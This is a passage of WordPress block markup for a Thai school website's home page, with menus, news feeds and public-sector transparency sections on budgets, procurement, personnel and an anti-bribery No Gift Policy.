8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":500,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/No-gift.png\" alt=\"\" class=\"wp-image-500\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 